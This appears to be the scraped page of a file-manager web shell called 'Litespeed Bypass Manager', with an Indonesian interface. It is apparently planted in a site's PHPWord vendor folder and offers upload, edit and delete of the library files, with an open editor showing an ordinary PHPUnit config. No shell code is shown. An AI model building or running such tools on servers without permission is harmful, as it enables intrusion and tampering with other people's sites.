Litespeed Bypass Manager
Direktori:
/admin/vendor/phpoffice/phpword
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📁
docs
Folder
Hapus
📁
samples
Folder
Hapus
📁
src
Folder
Hapus
📁
tests
Folder
Hapus
📄 .gitignore
Edit
Hapus
📄 .php_cs.dist
Edit
Hapus
📄 .scrutinizer.yml
Edit
Hapus
📄 .travis.yml
Edit
Hapus
📄 .travis_shell_after_success.sh
Edit
Hapus
📄 CHANGELOG.md
Edit
Hapus
📄 CONTRIBUTING.md
Edit
Hapus
📄 COPYING
Edit
Hapus
📄 COPYING.LESSER
Edit
Hapus
📄 LICENSE
Edit
Hapus
📄 README.md
Edit
Hapus
📄 VERSION
Edit
Hapus
📄 bootstrap.php
Edit
Hapus
📄 composer.json
Edit
Hapus
📄 phpmd.xml.dist
Edit
Hapus
📄 phpstan.neon
Edit
Hapus
📄 phpunit.xml.dist
Edit
Hapus
📄 phpword.ini.dist
Edit
Hapus
Edit File: phpunit.xml.dist
<phpunit backupGlobals="false" backupStaticAttributes="false" bootstrap="./tests/bootstrap.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false" syntaxCheck="false"> <testsuites> <testsuite name="PhpWord Test Suite"> <directory>./tests/PhpWord</directory> </testsuite> </testsuites> <filter> <whitelist> <directory suffix=".php">./src</directory> <exclude> <directory suffix=".php">./src/PhpWord/Shared/PCLZip</directory> </exclude> </whitelist> </filter> <logging> <log type="coverage-html" target="./build/coverage" charset="UTF-8" highlight="true" /> <log type="coverage-clover" target="./build/logs/clover.xml" /> </logging> </phpunit>
Simpan
Catatan: Mengedit file biner tidak disarankan.